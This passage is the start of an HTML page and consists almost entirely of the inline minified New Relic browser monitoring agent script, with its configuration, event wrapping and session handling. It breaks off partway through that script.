<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={privacy:{cookies_enabled:true},ajax:{deny_list:["bam.nr-data.net"]},distributed_tracing:{enabled:true}};(window.NREUM||(NREUM={})).loader_config={agentID:"1134530215",accountID:"5604697",trustKey:"5604697",xpid:"UQAHVVBaDxABVFJbBQECU1QD",licenseKey:"NRJS-bd3594867243bdc7468",applicationID:"1039205502"};;/*! For license information please see nr-loader-spa-1.274.0.min.js.LICENSE.txt */ (()=>{var e,t,r={8122:(e,t,r)=>{"use strict";r.d(t,{a:()=>i});var n=r(944);function i(e,t){try{if(!e||"object"!=typeof e)return(0,n.R)(3);if(!t||"object"!=typeof t)return(0,n.R)(4);const r=Object.create(Object.getPrototypeOf(t),Object.getOwnPropertyDescriptors(t)),o=0===Object.keys(r).length?e:r;for(let a in o)if(void 0!==e[a])try{if(null===e[a]){r[a]=null;continue}Array.isArray(e[a])&&Array.isArray(t[a])?r[a]=Array.from(new Set([...e[a],...t[a]])):"object"==typeof e[a]&&"object"==typeof t[a]?r[a]=i(e[a],t[a]):r[a]=e[a]}catch(e){(0,n.R)(1,e)}return r}catch(e){(0,n.R)(2,e)}}},2555:(e,t,r)=>{"use strict";r.d(t,{Vp:()=>c,fn:()=>s,x1:()=>u});var n=r(384),i=r(8122);const o={beacon:n.NT.beacon,errorBeacon:n.NT.errorBeacon,licenseKey:void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},a={};function s(e){try{const t=c(e);return!!t.licenseKey&&!!t.errorBeacon&&!!t.applicationID}catch(e){return!1}}function c(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!a[e])throw new Error("Info for ".concat(e," was never set"));return a[e]}function u(e,t){if(!e)throw new Error("All info objects require an agent identifier!");a[e]=(0,i.a)(t,o);const r=(0,n.nY)(e);r&&(r.info=a[e])}},9417:(e,t,r)=>{"use strict";r.d(t,{D0:()=>h,gD:()=>g,xN:()=>p});var n=r(993);const i=e=>{if(!e||"string"!=typeof e)return!1;try{document.createDocumentFragment().querySelector(e)}catch{return!1}return!0};var o=r(2614),a=r(944),s=r(384),c=r(8122);const u="[data-nr-mask]",d=()=>{const e={mask_selector:"*",block_selector:"[data-nr-block]",mask_input_options:{color:!1,date:!1,"datetime-local":!1,email:!1,month:!1,number:!1,range:!1,search:!1,tel:!1,text:!1,time:!1,url:!1,week:!1,textarea:!1,select:!1,password:!0}};return{ajax:{deny_list:void 0,block_internal:!0,enabled:!0,harvestTimeSeconds:10,autoStart:!0},distributed_tracing:{enabled:void 0,exclude_newrelic_header:void 0,cors_use_newrelic_header:void 0,cors_use_tracecontext_headers:void 0,allowed_origins:void 0},feature_flags:[],generic_events:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},harvest:{tooManyRequestsDelay:60},jserrors:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},logging:{enabled:!0,harvestTimeSeconds:10,autoStart:!0,level:n.p_.INFO},metrics:{enabled:!0,autoStart:!0},obfuscate:void 0,page_action:{enabled:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},performance:{capture_marks:!1,capture_measures:!1},privacy:{cookies_enabled:!0},proxy:{assets:void 0,beacon:void 0},session:{expiresMs:o.wk,inactiveMs:o.BB},session_replay:{autoStart:!0,enabled:!1,harvestTimeSeconds:60,preload:!1,sampling_rate:10,error_sampling_rate:100,collect_fonts:!1,inline_images:!1,fix_stylesheets:!0,mask_all_inputs:!0,get mask_text_selector(){return e.mask_selector},set mask_text_selector(t){i(t)?e.mask_selector="".concat(t,",").concat(u):""===t||null===t?e.mask_selector=u:(0,a.R)(5,t)},get block_class(){return"nr-block"},get ignore_class(){return"nr-ignore"},get mask_text_class(){return"nr-mask"},get block_selector(){return e.block_selector},set block_selector(t){i(t)?e.block_selector+=",".concat(t):""!==t&&(0,a.R)(6,t)},get mask_input_options(){return e.mask_input_options},set mask_input_options(t){t&&"object"==typeof t?e.mask_input_options={...t,password:!0}:(0,a.R)(7,t)}},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},soft_navigations:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},spa:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},ssl:void 0,user_actions:{enabled:!0}}},l={},f="All configuration objects require an agent identifier!";function h(e){if(!e)throw new Error(f);if(!l[e])throw new Error("Configuration for ".concat(e," was never set"));return l[e]}function p(e,t){if(!e)throw new Error(f);l[e]=(0,c.a)(t,d());const r=(0,s.nY)(e);r&&(r.init=l[e])}function g(e,t){if(!e)throw new Error(f);var r=h(e);if(r){for(var n=t.split("."),i=0;i<n.length-1;i++)if("object"!=typeof(r=r[n[i]]))return;r=r[n[n.length-1]]}return r}},5603:(e,t,r)=>{"use strict";r.d(t,{a:()=>c,o:()=>s});var n=r(384),i=r(8122);const o={accountID:void 0,trustKey:void 0,agentID:void 0,licenseKey:void 0,applicationID:void 0,xpid:void 0},a={};function s(e){if(!e)throw new Error("All loader-config objects require an agent identifier!");if(!a[e])throw new Error("LoaderConfig for ".concat(e," was never set"));return a[e]}function c(e,t){if(!e)throw new Error("All loader-config objects require an agent identifier!");a[e]=(0,i.a)(t,o);const r=(0,n.nY)(e);r&&(r.loader_config=a[e])}},3371:(e,t,r)=>{"use strict";r.d(t,{V:()=>f,f:()=>l});var n=r(8122),i=r(384),o=r(6154),a=r(9324);let s=0;const c={buildEnv:a.F3,distMethod:a.Xs,version:a.xv,originTime:o.WN},u={customTransaction:void 0,disabled:!1,isolatedBacklog:!1,loaderType:void 0,maxBytes:3e4,onerror:void 0,ptid:void 0,releaseIds:{},appMetadata:{},session:void 0,denyList:void 0,timeKeeper:void 0,obfuscator:void 0},d={};function l(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!d[e])throw new Error("Runtime for ".concat(e," was never set"));return d[e]}function f(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");d[e]={...(0,n.a)(t,u),...c},Object.hasOwnProperty.call(d[e],"harvestCount")||Object.defineProperty(d[e],"harvestCount",{get:()=>++s});const r=(0,i.nY)(e);r&&(r.runtime=d[e])}},9324:(e,t,r)=>{"use strict";r.d(t,{F3:()=>i,Xs:()=>o,Yq:()=>a,xv:()=>n});const n="1.274.0",i="PROD",o="CDN",a="^2.0.0-alpha.17"},6154:(e,t,r)=>{"use strict";r.d(t,{A4:()=>s,OF:()=>d,RI:()=>i,WN:()=>h,bv:()=>o,gm:()=>a,lR:()=>f,m:()=>u,mw:()=>c,sb:()=>l});var n=r(1863);const i="undefined"!=typeof window&&!!window.document,o="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigator instanceof WorkerNavigator),a=i?window:"undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis),s="complete"===a?.document?.readyState,c=Boolean("hidden"===a?.document?.visibilityState),u=""+a?.location,d=/iPad|iPhone|iPod/.test(a.navigator?.userAgent),l=d&&"undefined"==typeof SharedWorker,f=(()=>{const e=a.navigator?.userAgent?.match(/Firefox[/\s](\d+\.\d+)/);return Array.isArray(e)&&e.length>=2?+e[1]:0})(),h=Date.now()-(0,n.t)()},7295:(e,t,r)=>{"use strict";r.d(t,{Xv:()=>a,gX:()=>i,iW:()=>o});var n=[];function i(e){if(!e||o(e))return!1;if(0===n.length)return!0;for(var t=0;t<n.length;t++){var r=n[t];if("*"===r.hostname)return!1;if(s(r.hostname,e.hostname)&&c(r.pathname,e.pathname))return!1}return!0}function o(e){return void 0===e.hostname}function a(e){if(n=[],e&&e.length)for(var t=0;t<e.length;t++){let r=e[t];if(!r)continue;0===r.indexOf("http://")?r=r.substring(7):0===r.indexOf("https://")&&(r=r.substring(8));const i=r.indexOf("/");let o,a;i>0?(o=r.substring(0,i),a=r.substring(i)):(o=r,a="");let[s]=o.split(":");n.push({hostname:s,pathname:a})}}function s(e,t){return!(e.length>t.length)&&t.indexOf(e)===t.length-e.length}function c(e,t){return 0===e.indexOf("/")&&(e=e.substring(1)),0===t.indexOf("/")&&(t=t.substring(1)),""===e||e===t}},1687:(e,t,r)=>{"use strict";r.d(t,{Ak:()=>c,Ze:()=>l,x3:()=>u});var n=r(7836),i=r(3606),o=r(860),a=r(2646);const s={};function c(e,t){const r={staged:!1,priority:o.P3[t]||0};d(e),s[e].get(t)||s[e].set(t,r)}function u(e,t){e&&s[e]&&(s[e].get(t)&&s[e].delete(t),h(e,t,!1),s[e].size&&f(e))}function d(e){if(!e)throw new Error("agentIdentifier required");s[e]||(s[e]=new Map)}function l(e="",t="feature",r=!1){if(d(e),!e||!s[e].get(t)||r)return h(e,t);s[e].get(t).staged=!0,f(e)}function f(e){const t=Array.from(s[e]);t.every((([e,t])=>t.staged))&&(t.sort(((e,t)=>e[1].priority-t[1].priority)),t.forEach((([t])=>{s[e].delete(t),h(e,t)})))}function h(e,t,r=!0){const o=e?n.ee.get(e):n.ee,s=i.i.handlers;if(!o.aborted&&o.backlog&&s){if(r){const e=o.backlog[t],r=s[t];if(r){for(let t=0;e&&t<e.length;++t)p(e[t],r);Object.entries(r).forEach((([e,t])=>{Object.values(t||{}).forEach((t=>{t[0]?.on&&t[0]?.context()instanceof a.y&&t[0].on(e,t[1])}))}))}}o.isolatedBacklog||delete s[t],o.backlog[t]=null,o.emit("drain-"+t,[])}}function p(e,t){var r=e[1];Object.values(t[r]||{}).forEach((t=>{var r=e[0];if(t[0]===r){var n=t[1],i=e[3],o=e[2];n.apply(i,o)}}))}},7836:(e,t,r)=>{"use strict";r.d(t,{P:()=>c,ee:()=>u});var n=r(384),i=r(8990),o=r(3371),a=r(2646),s=r(5607);const c="nr@context:".concat(s.W),u=function e(t,r){var n={},s={},d={},l=!1;try{l=16===r.length&&(0,o.f)(r).isolatedBacklog}catch(e){}var f={on:p,addEventListener:p,removeEventListener:function(e,t){var r=n[e];if(!r)return;for(var i=0;i<r.length;i++)r[i]===t&&r.splice(i,1)},emit:function(e,r,n,i,o){!1!==o&&(o=!0);if(u.aborted&&!i)return;t&&o&&t.emit(e,r,n);for(var a=h(n),c=g(e),d=c.length,l=0;l<d;l++)c[l].apply(a,r);var p=v()[s[e]];p&&p.push([f,e,r,a]);return a},get:m,listeners:g,context:h,buffer:function(e,t){const r=v();if(t=t||"feature",f.aborted)return;Object.entries(e||{}).forEach((([e,n])=>{s[n]=t,t in r||(r[t]=[])}))},abort:function(){f._aborted=!0,Object.keys(f.backlog).forEach((e=>{delete f.backlog[e]}))},isBuffering:function(e){return!!v()[s[e]]},debugId:r,backlog:l?{}:t&&"object"==typeof t.backlog?t.backlog:{},isolatedBacklog:l};return Object.defineProperty(f,"aborted",{get:()=>{let e=f._aborted||!1;return e||(t&&(e=t.aborted),e)}}),f;function h(e){return e&&e instanceof a.y?e:e?(0,i.I)(e,c,(()=>new a.y(c))):new a.y(c)}function p(e,t){n[e]=g(e).concat(t)}function g(e){return n[e]||[]}function m(t){return d[t]=d[t]||e(f,t)}function v(){return f.backlog}}(void 0,"globalEE"),d=(0,n.Zm)();d.ee||(d.ee=u)},2646:(e,t,r)=>{"use strict";r.d(t,{y:()=>n});class n{constructor(e){this.contextId=e}}},9908:(e,t,r)=>{"use strict";r.d(t,{d:()=>n,p:()=>i});var n=r(7836).ee.get("handle");function i(e,t,r,i,o){o?(o.buffer([e],i),o.emit(e,t,r)):(n.buffer([e],i),n.emit(e,t,r))}},3606:(e,t,r)=>{"use strict";r.d(t,{i:()=>o});var n=r(9908);o.on=a;var i=o.handlers={};function o(e,t,r,o){a(o||n.d,i,e,t,r)}function a(e,t,r,i,o){o||(o="feature"),e||(e=n.d);var a=t[o]=t[o]||{};(a[r]=a[r]||[]).push([e,i])}},3878:(e,t,r)=>{"use strict";function n(e,t){return{capture:e,passive:!1,signal:t}}function i(e,t,r=!1,i){window.addEventListener(e,t,n(r,i))}function o(e,t,r=!1,i){document.addEventListener(e,t,n(r,i))}r.d(t,{DD:()=>o,jT:()=>n,sp:()=>i})},5607:(e,t,r)=>{"use strict";r.d(t,{W:()=>n});const n=(0,r(9566).bz)()},9566:(e,t,r)=>{"use strict";r.d(t,{LA:()=>s,ZF:()=>c,bz:()=>a,el:()=>u});var n=r(6154);const i="xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx";function o(e,t){return e?15&e[t]:16*Math.random()|0}function a(){const e=n.gm?.crypto||n.gm?.msCrypto;let t,r=0;return e&&e.getRandomValues&&(t=e.getRandomValues(new Uint8Array(30))),i.split("").map((e=>"x"===e?o(t,r++).toString(16):"y"===e?(3&o()|8).toString(16):e)).join("")}function s(e){const t=n.gm?.crypto||n.gm?.msCrypto;let r,i=0;t&&t.getRandomValues&&(r=t.getRandomValues(new Uint8Array(e)));const a=[];for(var s=0;s<e;s++)a.push(o(r,i++).toString(16));return a.join("")}function c(){return s(16)}function u(){return s(32)}},2614:(e,t,r)=>{"use strict";r.d(t,{BB:()=>a,H3:()=>n,g:()=>u,iL:()=>c,tS:()=>s,uh:()=>i,wk:()=>o});const n="NRBA",i="SESSION",o=144e5,a=18e5,s={STARTED:"session-started",PAUSE:"session-pause",RESET:"session-reset",RESUME:"session-resume",UPDATE:"session-update"},c={SAME_TAB:"same-tab",CROSS_TAB:"cross-tab"},u={OFF:0,FULL:1,ERROR:2}},1863:(e,t,r)=>{"use strict";function n(){return Math.floor(performance.now())}r.d(t,{t:()=>n})},7485:(e,t,r)=>{"use strict";r.d(t,{D:()=>i});var n=r(6154);function i(e){if(0===(e||"").indexOf("data:"))return{protocol:"data"};try{const t=new URL(e,location.href),r={port:t.port,hostname:t.hostname,pathname:t.pathname,search:t.search,protocol:t.protocol.slice(0,t.protocol.indexOf(":")),sameOrigin:t.protocol===n.gm?.location?.protocol&&t.host===n.gm?.location?.host};return r.port&&""!==r.port||("http:"===t.protocol&&(r.port="80"),"https:"===t.protocol&&(r.port="443")),r.pathname&&""!==r.pathname?r.pathname.startsWith("/")||(r.pathname="/".concat(r.pathname)):r.pathname="/",r}catch(e){return{}}}},944:(e,t,r)=>{"use strict";function n(e,t){"function"==typeof console.debug&&console.debug("New Relic Warning: https://github.com/newrelic/newrelic-browser-agent/blob/main/docs/warning-codes.md#".concat(e),t)}r.d(t,{R:()=>n})},5284:(e,t,r)=>{"use strict";r.d(t,{t:()=>c,B:()=>s});var n=r(7836),i=r(6154);const o="newrelic";const a=new Set,s={};function c(e,t){const r=n.ee.get(t);s[t]??={},e&&"object"==typeof e&&(a.has(t)||(r.emit("rumresp",[e]),s[t]=e,a.add(t),function(e={}){try{i.gm.dispatchEvent(new CustomEvent(o,{detail:e}))}catch(e){}}({loaded:!0})))}},8990:(e,t,r)=>{"use strict";r.d(t,{I:()=>i});var n=Object.prototype.hasOwnProperty;function i(e,t,r){if(n.call(e,t))return e[t];var i=r();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,t,{value:i,writable:!0,enumerable:!1}),i}catch(e){}return e[t]=i,i}},6389:(e,t,r)=>{"use strict";function n(e,t=500,r={}){const n=r?.leading||!1;let i;return(...r)=>{n&&void 0===i&&(e.apply(this,r),i=setTimeout((()=>{i=clearTimeout(i)}),t)),n||(clearTimeout(i),i=setTimeout((()=>{e.apply(this,r)}),t))}}function i(e){let t=!1;return(...r)=>{t||(t=!0,e.apply(this,r))}}r.d(t,{J:()=>i,s:()=>n})},3304:(e,t,r)=>{"use strict";r.d(t,{A:()=>o});var n=r(7836);const i=()=>{const e=new WeakSet;return(t,r)=>{if("object"==typeof r&&null!==r){if(e.has(r))return;e.add(r)}return r}};function o(e){try{return JSON.stringify(e,i())??""}catch(e){try{n.ee.emit("internal-error",[e])}catch(e){}return""}}},5289:(e,t,r)=>{"use strict";r.d(t,{GG:()=>o,sB:()=>a});var n=r(3878);function i(){return"undefined"==typeof document||"complete"===document.readyState}function o(e,t){if(i())return e();(0,n.sp)("load",e,t)}function a(e){if(i())return e();(0,n.DD)("DOMContentLoaded",e)}},384:(e,t,r)=>{"use strict";r.d(t,{NT:()=>o,US:()=>d,Zm:()=>a,bQ:()=>c,dV:()=>s,nY:()=>u,pV:()=>l});var n=r(6154),i=r(1863);const o={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net"};function a(){return n.gm.NREUM||(n.gm.NREUM={}),void 0===n.gm.newrelic&&(n.gm.newrelic=n.gm.NREUM),n.gm.NREUM}function s(){let e=a();return e.o||(e.o={ST:n.gm.setTimeout,SI:n.gm.setImmediate,CT:n.gm.clearTimeout,XHR:n.gm.XMLHttpRequest,REQ:n.gm.Request,EV:n.gm.Event,PR:n.gm.Promise,MO:n.gm.MutationObserver,FETCH:n.gm.fetch,WS:n.gm.WebSocket}),e}function c(e,t){let r=a();r.initializedAgents??={},t.initializedAt={ms:(0,i.t)(),date:new Date},r.initializedAgents[e]=t}function u(e){let t=a();return t.initializedAgents?.[e]}function d(e,t){a()[e]=t}function l(){return function(){let e=a();const t=e.info||{};e.info={beacon:o.beacon,errorBeacon:o.errorBeacon,...t}}(),function(){let e=a();const t=e.init||{};e.init={...t}}(),s(),function(){let e=a();const t=e.loader_config||{};e.loader_config={...t}}(),a()}},2843:(e,t,r)=>{"use strict";r.d(t,{u:()=>i});var n=r(3878);function i(e,t=!1,r,i){(0,n.DD)("visibilitychange",(function(){if(t)return void("hidden"===document.visibilityState&&e());e(document.visibilityState)}),r,i)}},8139:(e,t,r)=>{"use strict";r.d(t,{u:()=>f});var n=r(7836),i=r(3434),o=r(8990),a=r(6154);const s={},c=a.gm.XMLHttpRequest,u="addEventListener",d="removeEventListener",l="nr@wrapped:".concat(n.P);function f(e){var t=function(e){return(e||n.ee).get("events")}(e);if(s[t.debugId]++)return t;s[t.debugId]=1;var r=(0,i.YM)(t,!0);function f(e){r.inPlace(e,[u,d],"-",p)}function p(e,t){return e[1]}return"getPrototypeOf"in Object&&(a.RI&&h(document,f),h(a.gm,f),h(c.prototype,f)),t.on(u+"-start",(function(e,t){var n=e[1];if(null!==n&&("function"==typeof n||"object"==typeof n)){var i=(0,o.I)(n,l,(function(){var e={object:function(){if("function"!=typeof n.handleEvent)return;return n.handleEvent.apply(n,arguments)},function:n}[typeof n];return e?r(e,"fn-",null,e.name||"anonymous"):n}));this.wrapped=e[1]=i}})),t.on(d+"-start",(function(e){e[1]=this.wrapped||e[1]})),t}function h(e,t,...r){let n=e;for(;"object"==typeof n&&!Object.prototype.hasOwnProperty.call(n,u);)n=Object.getPrototypeOf(n);n&&t(n,...r)}},3434:(e,t,r)=>{"use strict";r.d(t,{Jt:()=>o,YM:()=>c});var n=r(7836),i=r(5607);const o="nr@original:".concat(i.W);var a=Object.prototype.hasOwnProperty,s=!1;function c(e,t){return e||(e=n.ee),r.inPlace=function(e,t,n,i,o){n||(n="");const a="-"===n.charAt(0);for(let s=0;s<t.length;s++){const c=t[s],u=e[c];d(u)||(e[c]=r(u,a?c+n:n,i,c,o))}},r.flag=o,r;function r(t,r,n,s,c){return d(t)?t:(r||(r=""),nrWrapper[o]=t,function(e,t,r){if(Object.defineProperty&&Object.keys)try{return Object.keys(e).forEach((function(r){Object.defineProperty(t,r,{get:function(){return e[r]},set:function(t){return e[r]=t,t}})})),t}catch(e){u([e],r)}for(var n in e)a.call(e,n)&&(t[n]=e[n])}(t,nrWrapper,e),nrWrapper);function nrWrapper(){var o,a,d,l;try{a=this,o=[...arguments],d="function"==typeof n?n(o,a):n||{}}catch(t){u([t,"",[o,a,s],d],e)}i(r+"start",[o,a,s],d,c);try{return l=t.apply(a,o)}catch(e){throw i(r+"err",[o,a,e],d,c),e}finally{i(r+"end",[o,a,l],d,c)}}}function i(r,n,i,o){if(!s||t){var a=s;s=!0;try{e.emit(r,n,i,t,o)}catch(t){u([t,r,n,i],e)}s=a}}}function u(e,t){t||(t=n.ee);try{t.emit("internal-error",e)}catch(e){}}function d(e){return!(e&&"function"==typeof e&&e.apply&&!e[o])}},9300:(e,t,r)=>{"use strict";r.d(t,{T:()=>n});const n=r(860).K7.ajax},3333:(e,t,r)=>{"use strict";r.d(t,{TZ:()=>n,Zp:()=>i,mq:()=>s,nf:()=>a,qN:()=>o});const n=r(860).K7.genericEvents,i=["auxclick","click","copy","keydown","paste","scrollend"],o=["focus","blur"],a=4,s=1e3},6774:(e,t,r)=>{"use strict";r.d(t,{T:()=>n});const n=r(860).K7.jserrors},993:(e,t,r)=>{"use strict";r.d(t,{ET:()=>o,TZ:()=>a,p_:()=>i});var n=r(860);const i={ERROR:"ERROR",WARN:"WARN",INFO:"INFO",DEBUG:"DEBUG",TRACE:"TRACE"},o="log",a=n.K7.logging},3785:(e,t,r)=>{"use strict";r.d(t,{R:()=>c,b:()=>u});var n=r(9908),i=r(1863),o=r(860),a=r(3969),s=r(993);function c(e,t,r={},c=s.p_.INFO){(0,n.p)(a.xV,["API/logging/".concat(c.toLowerCase(),"/called")],void 0,o.K7.metrics,e),(0,n.p)(s.ET,[(0,i.t)(),t,r,c],void 0,o.K7.logging,e)}function u(e){return"string"==typeof e&&Object.values(s.p_).some((t=>t===e.toUpperCase().trim()))}},3969:(e,t,r)=>{"use strict";r.d(t,{TZ:()=>n,XG:()=>s,rs:()=>i,xV:()=>a,z_:()=>o});const n=r(860).K7.metrics,i="sm",o="cm",a="storeSupportabilityMetrics",s="storeEventMetrics"},6630:(e,t,r)=>{"use strict";r.d(t,{T:()=>n});const n=r(860).K7.pageViewEvent},782:(e,t,r)=>{"use strict";r.d(t,{T:()=>n});const n=r(860).K7.pageViewTiming},6344:(e,t,r)=>{"use strict";r.d(t,{BB:()=>d,G4:()=>o,Qb:()=>l,TZ:()=>i,Ug:()=>a,_s:()=>s,bc:()=>u,yP:()=>c});var n=r(2614);const i=r(860).K7.sessionReplay,o={RECORD:"recordReplay",PAUSE:"pauseReplay",REPLAY_RUNNING:"replayRunning",ERROR_DURING_REPLAY:"errorDuringReplay"},a=.12,s={DomContentLoaded:0,Load:1,FullSnapshot:2,IncrementalSnapshot:3,Meta:4,Custom:5},c={[n.g.ERROR]:15e3,[n.g.FULL]:3e5,[n.g.OFF]:0},u={RESET:{message:"Session was reset",sm:"Reset"},IMPORT:{message:"Recorder failed to import",sm:"Import"},TOO_MANY:{message:"429: Too Many Requests",sm:"Too-Many"},TOO_BIG:{message:"Payload was too large",sm:"Too-Big"},CROSS_TAB:{message:"Session Entity was set to OFF on another tab",sm:"Cross-Tab"},ENTITLEMENTS:{message:"Session Replay is not allowed and will not be started",sm:"Entitlement"}},d=5e3,l={API:"api"}},5270:(e,t,r)=>{"use strict";r.d(t,{Aw:()=>c,CT:()=>u,SR:()=>s});var n=r(384),i=r(9417),o=r(7767),a=r(6154);function s(e){return!!(0,n.dV)().o.MO&&(0,o.V)(e)&&!0===(0,i.gD)(e,"session_trace.enabled")}function c(e){return!0===(0,i.gD)(e,"session_replay.preload")&&s(e)}function u(e,t){const r=t.correctAbsoluteTimestamp(e);return{originalTimestamp:e,correctedTimestamp:r,timestampDiff:e-r,originTime:a.WN,correctedOriginTime:t.correctedOriginTime,originTimeDiff:Math.floor(a.WN-t.correctedOriginTime)}}},3738:(e,t,r)=>{"use strict";r.d(t,{He:()=>i,Kp:()=>s,Lc:()=>u,Rz:()=>d,TZ:()=>n,bD:()=>o,d3:()=>a,jx:()=>l,uP:()=>c});const n=r(860).K7.sessionTrace,i="bstResource",o="resource",a="-start",s="-end",c="fn"+a,u="fn"+s,d="pushState",l=1e3},3962:(e,t,r)=>{"use strict";r.d(t,{AM:()=>o,O2:()=>s,Qu:()=>c,TZ:()=>a,ih:()=>u,tC:()=>i});var n=r(860);const i=["click","keydown","submit"],o="api",a=n.K7.softNav,s={INITIAL_PAGE_LOAD:"",ROUTE_CHANGE:1,UNSPECIFIED:2},c={INTERACTION:1,AJAX:2,CUSTOM_END:3,CUSTOM_TRACER:4},u={IP:"in progress",FIN:"finished",CAN:"cancelled"}},7378:(e,t,r)=>{"use strict";r.d(t,{$p:()=>x,BR:()=>b,Kp:()=>R,L3:()=>y,Lc:()=>c,NC:()=>o,SG:()=>d,TZ:()=>i,U6:()=>p,UT:()=>m,d3:()=>w,dT:()=>f,e5:()=>A,gx:()=>v,l9:()=>l,oW:()=>h,op:()=>g,rw:()=>u,tH:()=>E,uP:()=>s,wW:()=>T,xq:()=>a});var n=r(384);const i=r(860).K7.spa,o=["click","submit","keypress","keydown","keyup","change"],a=999,s="fn-start",c="fn-end",u="cb-start",d="api-ixn-",l="remaining",f="interaction",h="spaNode",p="jsonpNode",g="fetch-start",m="fetch-done",v="fetch-body-",b="jsonp-end",y=(0,n.dV)().o.ST,w="-start",R="-end",x="-body",T="cb"+R,A="jsTime",E="fetch"},4234:(e,t,r)=>{"use strict";r.d(t,{W:()=>o});var n=r(7836),i=r(1687);class o{constructor(e,t){this.agentIdentifier=e,this.ee=n.ee.get(e),this.featureName=t,this.blocked=!1}deregisterDrain(){(0,i.x3)(this.agentIdentifier,this.featureName)}}},7767:(e,t,r)=>{"use strict";r.d(t,{V:()=>o});var n=r(9417),i=r(6154);const o=e=>i.RI&&!0===(0,n.gD)(e,"privacy.cookies_enabled")},425:(e,t,r)=>{"use strict";r.d(t,{j:()=>j});var n=r(860),i=r(2555),o=r(3371),a=r(9908),s=r(7836),c=r(1687),u=r(5289),d=r(6154),l=r(944),f=r(3969),h=r(384),p=r(6344);const g=["setErrorHandler","finished","addToTrace","addRelease","addPageAction","setCurrentRouteName","setPageViewName","setCustomAttribute","interaction","noticeError","setUserId","setApplicationVersion","start",p.G4.RECORD,p.G4.PAUSE,"log","wrapLogger"],m=["setErrorHandler","finished","addToTrace","addRelease"];var v=r(1863),b=r(2614),y=r(993),w=r(3785),R=r(2646),x=r(3434);function T(e,t,r,n){if("object"!=typeof t||!t||"string"!=typeof r||!r||"function"!=typeof t[r])return(0,l.R)(29);const i=function(e){return(e||s.ee).get("logger")}(e),o=(0,x.YM)(i),a=new R.y(s.P);return a.level=n.level,a.customAttributes=n.customAttributes,o.inPlace(t,[r],"wrap-logger-",a),i}function A(){const e=(0,h.pV)();g.forEach((t=>{e[t]=(...r)=>function(t,...r){let n=[];return Object.values(e.initializedAgents).forEach((e=>{e&&e.api?e.exposed&&e.api[t]&&n.push(e.api[t](...r)):(0,l.R)(38,t)})),n.length>1?n:n[0]}(t,...r)}))}const E={};var S=r(9417),N=r(5603),O=r(5284);const _=e=>{const t=e.startsWith("http");e+="/",r.p=t?e:"https://"+e};let I=!1;function j(e,t={},g,R){let{init:x,info:j,loader_config:P,runtime:C={},exposed:k=!0}=t;C.loaderType=g;const L=(0,h.pV)();j||(x=L.init,j=L.info,P=L.loader_config),(0,S.xN)(e.agentIdentifier,x||{}),(0,N.a)(e.agentIdentifier,P||{}),j.jsAttributes??={},d.bv&&(j.jsAttributes.isWorker=!0),(0,i.x1)(e.agentIdentifier,j);const H=(0,S.D0)(e.agentIdentifier),D=[j.beacon,j.errorBeacon];I||(H.proxy.assets&&(_(H.proxy.assets),D.push(H.proxy.assets)),H.proxy.beacon&&D.push(H.proxy.beacon),A(),(0,h.US)("activatedFeatures",O.B),e.runSoftNavOverSpa&&=!0===H.soft_navigations.enabled&&H.feature_flags.includes("soft_nav")),C.denyList=[...H.ajax.deny_list||[],...H.ajax.block_internal?D:[]],C.ptid=e.agentIdentifier,(0,o.V)(e.agentIdentifier,C),e.ee=s.ee.get(e.agentIdentifier),void 0===e.api&&(e.api=function(e,t,h=!1){t||(0,c.Ak)(e,"api");const g={};var R=s.ee.get(e),x=R.get("tracer");E[e]=b.g.OFF,R.on(p.G4.REPLAY_RUNNING,(t=>{E[e]=t}));var A="api-",S=A+"ixn-";function N(t,r,n,o){const a=(0,i.Vp)(e);return null===r?delete a.jsAttributes[t]:(0,i.x1)(e,{...a,jsAttributes:{...a.jsAttributes,[t]:r}}),I(A,n,!0,o||null===r?"session":void 0)(t,r)}function O(){}g.log=function(e,{customAttributes:t={},level:r=y.p_.INFO}={}){(0,a.p)(f.xV,["API/log/called"],void 0,n.K7.metrics,R),(0,w.R)(R,e,t,r)},g.wrapLogger=(e,t,{customAttributes:r={},level:i=y.p_.INFO}={})=>{(0,a.p)(f.xV,["API/wrapLogger/called"],void 0,n.K7.metrics,R),T(R,e,t,{customAttributes:r,level:i})},m.forEach((e=>{g[e]=I(A,e,!0,"api")})),g.addPageAction=I(A,"addPageAction",!0,n.K7.genericEvents),g.setPageViewName=function(t,r){if("string"==typeof t)return"/"!==t.charAt(0)&&(t="/"+t),(0,o.f)(e).customTransaction=(r||"http://custom.transaction")+t,I(A,"setPageViewName",!0)()},g.setCustomAttribute=function(e,t,r=!1){if("string"==typeof e){if(["string","number","boolean"].includes(typeof t)||null===t)return N(e,t,"setCustomAttribute",r);(0,l.R)(40,typeof t)}else(0,l.R)(39,typeof e)},g.setUserId=function(e){if("string"==typeof e||null===e)return N("enduser.id",e,"setUserId",!0);(0,l.R)(41,typeof e)},g.setApplicationVersion=function(e){if("string"==typeof e||null===e)return N("application.version",e,"setApplicationVersion",!1);(0,l.R)(42,typeof e)},g.start=()=>{try{(0,a.p)(f.xV,["API/start/called"],void 